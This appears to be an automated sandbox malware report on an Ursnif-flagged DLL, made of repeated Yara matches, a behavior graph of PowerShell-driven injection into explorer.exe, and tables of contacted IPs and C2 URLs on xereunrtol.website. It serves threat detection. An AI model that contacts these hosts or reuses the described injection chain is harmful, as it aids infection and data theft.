Source: Yara match File source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 499264 Sample: uT9rwkGATJ.dll Startdate: 08/10/2021 Architecture: WINDOWS Score: 100 104 Found malware configuration 2->104 106 Sigma detected: Powershell run code from registry 2->106 108 Yara detected  Ursnif 2->108 110 9 other signatures 2->110 9 mshta.exe 19 2->9         started        12 loaddll32.exe 1 1 2->12         started        15 mshta.exe 2->15         started        process3 dnsIp4 130 Suspicious powershell command line found 9->130 17 powershell.exe 30 9->17         started        98 outlook.com 40.97.156.114, 443, 49754 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 12->98 100 HHN-efz.ms-acdc.office.com 52.97.151.18, 443, 49756 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 12->100 102 7 other IPs or domains 12->102 132 Writes to foreign memory regions 12->132 134 Writes or reads registry keys via WMI 12->134 136 Writes registry values via WMI 12->136 21 cmd.exe 1 12->21         started        23 rundll32.exe 12->23         started        25 control.exe 12->25         started        29 2 other processes 12->29 27 powershell.exe 15->27         started        signatures5 process6 file7 80 C:\Users\user\AppData\...\uio4qdnj.cmdline, UTF-8 17->80 dropped 112 Injects code into the Windows Explorer (explorer.exe) 17->112 114 Writes to foreign memory regions 17->114 116 Modifies the context of a thread in another process (thread injection) 17->116 31 explorer.exe 17->31 injected 34 csc.exe 17->34         started        37 csc.exe 17->37         started        39 conhost.exe 17->39         started        41 rundll32.exe 21->41         started        118 System process connects to network (likely due to code injection or exploit) 23->118 120 Writes registry values via WMI 23->120 44 rundll32.exe 25->44         started        122 Maps a DLL or memory area into another process 27->122 124 Creates a thread in another existing process (thread injection) 27->124 46 csc.exe 27->46         started        48 csc.exe 27->48         started        50 conhost.exe 27->50         started        signatures8 process9 dnsIp10 138 Changes memory attributes in foreign processes to executable or writable 31->138 140 Self deletion via cmd delete 31->140 142 Writes to foreign memory regions 31->142 146 5 other signatures 31->146 52 cmd.exe 31->52         started        55 cmd.exe 31->55         started        57 RuntimeBroker.exe 31->57 injected 82 C:\Users\user\AppData\Local\...\uio4qdnj.dll, PE32 34->82 dropped 59 cvtres.exe 34->59         started        84 C:\Users\user\AppData\Local\...\hjljqxud.dll, PE32 37->84 dropped 61 cvtres.exe 37->61         started        90 40.101.9.178, 443, 49765 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 41->90 92 40.97.160.2, 443, 49764 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 41->92 94 10 other IPs or domains 41->94 144 System process connects to network (likely due to code injection or exploit) 41->144 63 control.exe 41->63         started        86 C:\Users\user\AppData\Local\...\hiiw3gsl.dll, PE32 46->86 dropped 65 cvtres.exe 46->65         started        88 C:\Users\user\AppData\Local\...\ebytp2em.dll, PE32 48->88 dropped 67 cvtres.exe 48->67         started        file11 signatures12 process13 signatures14 126 Uses ping.exe to sleep 52->126 128 Uses ping.exe to check the status of other devices and networks 52->128 69 conhost.exe 52->69         started        71 PING.EXE 52->71         started        73 PING.EXE 55->73         started        76 conhost.exe 55->76         started        78 rundll32.exe 63->78         started        process15 dnsIp16 96 192.168.2.1 unknown unknown 73->96
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
40.97.156.114
 outlook.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
52.97.178.98
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true
193.29.104.83
 xereunrtol.website Romania
9009 M247GB false
52.97.151.18
 HHN-efz.ms-acdc.office.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
40.97.160.2
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true
40.101.9.178
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true
52.98.208.114
 FRA-efz.ms-acdc.office.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
outlook.com 40.97.156.114 true
HHN-efz.ms-acdc.office.com 52.97.151.18 true
FRA-efz.ms-acdc.office.com 52.98.208.114 true
xereunrtol.website 193.29.104.83 true
www.outlook.com unknown unknown
zereunrtol.website unknown unknown
outlook.office365.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://xereunrtol.website/pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop true
  • Avira URL Cloud: safe
 unknown
https://xereunrtol.website/pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop true
  • Avira URL Cloud: safe
 unknown
https://www.outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop false
    		high
    https://outlook.office365.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop false
      		high
      https://xereunrtol.website/pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop true
      • Avira URL Cloud: safe
      		 unknown
      https://outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop false
        		high
        https://outlook.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop false
          		high
          https://xereunrtol.website/pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop true
          • Avira URL Cloud: safe
          		 unknown
          https://outlook.office365.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop false
            		high
            https://xereunrtol.website/pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop true
            • Avira URL Cloud: safe
            		 unknown
            https://www.outlook.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop false
              		high